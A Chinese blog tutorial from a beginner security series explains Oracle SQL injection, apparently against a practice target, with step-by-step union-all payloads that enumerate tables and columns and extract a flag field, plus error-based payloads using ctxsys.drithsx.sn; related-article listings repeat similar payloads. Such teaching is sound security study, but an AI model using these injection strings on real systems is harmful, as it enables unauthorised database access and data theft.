网络安全零基础入门(第六章-5)Oracle注入——报错注入

最新推荐文章于 2023-07-21 16:21:40 发布
最新推荐文章于 2023-07-21 16:21:40 发布
阅读量202 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43660456/article/details/105415614
版权
  • 每日一句:没有学不会的东西,只有不努力的man
  • 本篇内容:注入函数解析
         报错注入+联合查询(union all)
         实战注意

一、注入函数解析

1.提示:
    Oracle注入比较麻烦,有点小难要有心理准备,原因是Oracle数据库本身比较复杂
         
2.报错注入原理
    报错注入是通过特殊函数错误使用并使其输出错误结果来获取信息的。
        
3.Oracle中的一个表 --Dual
    本质
       为了满足语句格式而诞生的一个临时表 (有人说是实表,有人说是虚表,无所谓)
         
    用法
       在mysql中可能可以直接这么写
       select 1,2,3;
       select user();   //查询当前用户
         
       但Oracle语法结构严谨,这么写:
       select 1,2,3 from Dual;
       select user from Dual;
         
       除此之外,还可以这么用:
       select dbms_random.random from dual   //获取随机值
       select 22+33 from dual    //计算加减法
         
       。。。。。。
       有很多小功能,有兴趣的同学可以自行探索
         
4.查询系统自带表
    select * from all_tables   //查询出所有的字段
    select * from user_tables  //查询出当前用户的字段
       
    提示:Oracle数据库弱化了库的概念,主要以用户名作为区分
       
    select * from all_tab_columns   //查询出所有的字段
    select * from user_tab_columns  //查询当前用户所有的字段
     
5.补充
    (1)所有数据库基本都区分大小写(引号内的内容),
      但是字段名一般不区分,比如FROM==from
          
    (2)limit 字段是mysql特有的,Oracle数据库有类似的rownum,但是又区别    
      例如:
        select * from user_tab_columns where tabIE_name=‘ADMIN’ and rownum<=1
           //输出1条数据 ; 当输出的是1条时,可以不写"<"
        select * from user_tab_columns where tabIE_name=‘ADMIN’ and rownum<=3
           //输出3条数据
              
    (3)屏蔽某个字段
        select * from user_tab_columns where tabIE_name=‘ADMIN’ and rownum=1
          and COLUMN_NAME <> ‘ID’
         //输出admin表中除了id字段所有内容
             
        select * from user_tab_columns where tabIE_name=‘ADMIN’ and rownum=1
          and COLUMN_NAME <> ‘ID’ and COLUMN_NAME <> ‘USER_NAME’
         //输出admin表中除了id,user_name字段的所有内容

二、报错注入+联合(union all)

1.判断注入点
    url id=1 ’ – qwe
      
2.判断字段数
    url id=1 ’ order by 3 – qwe
         
3.判断输出点
    url id=1 ’ union all select null,null,null from dual --qwe
    
4.查询系统自带表
    url’ union all select 1,null,to_nclob(TABLE_NAME) from user_tables --qwe
      //to_nclob()函数的作用:将值转换为 NCLOB 数据类型。这是偶然现象
       
5.得到字段
    url’ union all select 1,null,to_nclob(COLUMN_NAME) from user_tab_columns where        TABLE_NAME=‘ADMIN’ – qwe
      //查询ADMIN内的字段,可以在最后增加限制:AND rownum=1 and          COLUMN_NAME<>‘ID’等等
        
6.查询内容
    url’ union all select 1,null,to_nclob(FLAG_FLAG) from ADMIN --qwe
      
7.补充,查询当前用户
    url’ union all select 1,null,to_nclob(user) from DUAL --qwe

三、实战注意

1.报错函数(类似updatexml()的用法)
   用法
   and 1=ctxsys.drithsx.sn(1,(select TABLE_NAME from user_tables where rownum=1))-- qwe     
     //查询当前用户有什么表,这就是固定用法,这个函数我在网上也没找到太多的内容。
     //报错注入,一次不能显示太多的数据
      
   and 1=ctxsys.drithsx.sn(1,(select TABLE_NAME from user_tables where rownum=1 and table_name <> ‘ADMIN’))-- qwe
     //用了报错注入就不用纠结类型了,但是就是输出单行了
      
2.union all的用法
    基本除了MySQL其他的数据库的联合查询都需要这么写。不然会报错
    但是,mysql也是可以这么用的,MySQL用了加上all,会将重复的数据也显出
      
3.oracle的注释
   --这是单行注释
   
   /*
     这是多行注释
   */

四、总结

  • 理解报错注入的原理
  • 熟练掌握报错注入经常用到的函数
划水的小白
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全自学篇] 六十.Cracer第八期——(2)五万字总结Linux基础知识和常用渗透命令
杨秀璋的专栏
03-19 1万+
作为Web渗透的初学者,Linux基础知识和常用命令是我们的必备技能,本文详细讲解了Linux相关知识点及Web渗透免了高龄。如果想玩好Kali或渗透,你需要学好Linux及相关命令,以及端口扫描、漏洞利用、瑞士军刀等工具。安全领域通常分为网络安全(Web渗透)和系统安全(PWN逆向)两个方向。非常基础的一篇文章,希望能够帮助到您!
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
热门推荐
杨秀璋的专栏
04-10 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。由于hack the box速度堪忧,作者选择了Vulnhub靶场,希望深入分析来
Oracle-报错注入
weixin_45634365的博客
03-05 514
一、Oracle数据库简介 Oracle数据库系统,是美国ORACLE公司(甲骨文)提供的以分布式数据库为核心的一组软件产品,是一种关系数据库,数据库体量较大,一般与jsp网站联合。 常见的数据库:MySQL、MSSQL、Access、Oracle Oracle使用免费,但如果使用中的数据库遇到了问题,例如数据丢失、数据库打不开等等,想要解决问题,就必须寻找Oracle官方的服务,而服务价格不菲,而这就是Oracle的盈利方式。 Oracle比MySQL、MSSQL、Access更为先进,对大数据的处理能力
Oracle注入——报错注入
m0_55854679的博客
02-19 2786
SQL注入之重新认识 文章目录Oracle数据库dual表数据库语句报错注入函数解析练习 Oracle数据库 一般大公司用的多,很贵,环境搭建复杂且大,数据库死板,非常讲究语法格式,区分大小写,数据类型很多。dual虚表,专门用来满足oracle数据库严格的语法格式,为凑格式所存在。一般数据库强调库、表名、字段、内容,但Oracle数据库种库被弱化,用户被强化,一个用户代表一个库。 dual表 Dual是一个实表(也有人说它是虚表),如果你直接查询它,它只显示一个X,列名为DUMMY,那么要它有什么用呢?
数据库注入学习笔记4---Oracle注入(报错注入)
qq_41759633的博客
08-07 599
先看以下不同: Dual Oracle中的系统表 rownum=1 与limit相似 and table name<>‘ADMIN’ 暂时理解为排除某个表或者字段 使用 ?id=1’ 产生报错信息 使用 ctxsys.brithsx.sn() 进行报错注入 查询库名 查询表名 把admin排除查询第二个表,同样的把查询出来的NEWS排除得到第三个...
封神台Oracle注入- 报错注入
qq_40941912的博客
10-05 1040
一、原理 跟MySQL的注入一样,都是程序原本要执行的sql语句拼接了用户输入的语句,导致出现了不该出现的数据。不同的数据库使用的函数不同,Oracle使用的是ctxsys.drithsx.sn函数实现报错注入。 二、作业 Oracle注入- 报错注入 (Rank: 5) 在id=1 后添加and 1=1 发现页面可以正常显示,推断此处可能存在注入点 通过报错注入函数查询当前表名:and 1=ctxsys.drithsx.sn(1,(select table_name from user_tabl
渗透测试入门—— 常见术语概述
weixin_46694260的博客
12-26 8966
00x1 前言 刚入门小白,收集了一些渗透术语,废话不多说。 00x2 渗透术语 1.脚本 动态网站(如:asp,php,jsp), linux, python 2.网站 2.1静态网站:与后台交互比较少,如html) 2.2动态网站:使用动态脚本编写 如:asp,php,jsp,交互方便但是安全性不高,如果代码过滤不严格可能会导致漏洞最终导致后台linux被别人随意操作 3.http协议 http(HyperText Transfer Protocol),超文本传输协议。是因特网上应用最为广泛的一种网络传
狂神说——SpringBoot学习
weixin_44543307的博客
12-06 4765
Springboot 学习笔记Springboot简介什么是微服务?ThymeleafDuridSpringboot整合mybatisSpringSecurity安全Shiroswagger定时任务springboot 整合分布式 dubbo+ zookeeper+ springbootDubboRPC(两大核心:通讯,序列化)Zookeeper总结 学习源码 spring官网 springboot官网 spring-security版本下载 狂神官网学习 也可以搜索B站 (狂神说) Springboot简
基于《狂神说Java》Redis--学习笔记
wudidahuanggua的博客
06-19 1597
本笔记仅做学习与复习使用,不存在刻意抄袭。给各位学友强烈推荐《遇见狂神说》他的整套Java学习路线使我获益匪浅!!!
Oracle_SQL注入
07-01
Oracle_SQL注入果断分享
CnsaferSI (JSP+oracle注入工具)
09-02
使用比较广泛的JSP+oracle注入工具
JSP+ORACLE注入方法
06-30
AD表为例来说明JSP+ORACLE注入 , 呵呵 大家来玩玩。
104.[提高班]网络渗透靶场Oracle+phpStudy本地搭建万字详解1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。提高篇:(自学系
oracle——显错注入报错注入
qq_45300786的博客
08-14 841
http://59.63.200.79:8808/index_x.php 这个网址提供了,Oracle的数据库接口,我们就可以直接用这个,而不用自己搭建了。 dual这个是一个虚表,是不存在的,是为了专门满足格式而存在的一个表。 因为你Oracle不像mysql一样,后面不加表也行,他是必须加个表名满足格式,但是为了方便就提供了dual这个表。 Oracle弱化了库的概念,强化了用户的概念。就是说把库换成了用户来查询数据。 oracle里面有多个条数据,他就排序多少个rownum,有点像mysql里的i
SQL注入Oracle环境搭建
最新发布
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
07-21 407
Database,又名Oracle,或简称Oracle。是的一款。它是在数据库领域一直处于领先地位的产品。可以说Oracle是世界上流行的管理系统,系统好、使用方便、功能强,适用于各类大、中、小微机环境。它是一种高效率的、可靠性好的、适应高的数据库方案。
分分钟搭建Oracle环境
congbao6525的博客
06-07 180
Oracle运维中,有一个很基础的工作就是安装数据库软件,而这个工作一般少则需要花费个把小时,多则半天。 如果我们有大批量的服务器安装任务,那么这种时候你肯定会希望从这种重复性劳动中解放出来,人工操作还是会有或多或少的差错,...
oracle注入环境变量,Oracle环境变量
weixin_39785081的博客
04-03 230
一、Oracle环境变量Oracle数据库的安装和运行都需要环境变量,常用的Oracle环境变量如下。1、ORACLE_HOMEOracle软件安装的根目录,存放了Oracle的可执行程序、管理工具、函数库、java虚拟机、帮助文档、示例代码等。2、ORACLE_BASEOracle实例(数据库)的根目录,存放了实例的控制文件、数据文件、日志文件、审计日志、错误报告等。3、ORACLE_SIDOr...
oracle注入环境变量,oracle环境变量配置
weixin_40001309的博客
04-03 165
oracle环境变量设置# Oracle Settings umask 022 export ORACLE_HOSTNAME=node1 export ORACLE_BASE=/oracle export ORACLE_HOME=$ORACLE_BASE/product/11.2.3 export ORACLE_SID=orcl1 export PATH=$PATH:$ORACLE_HOME/...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值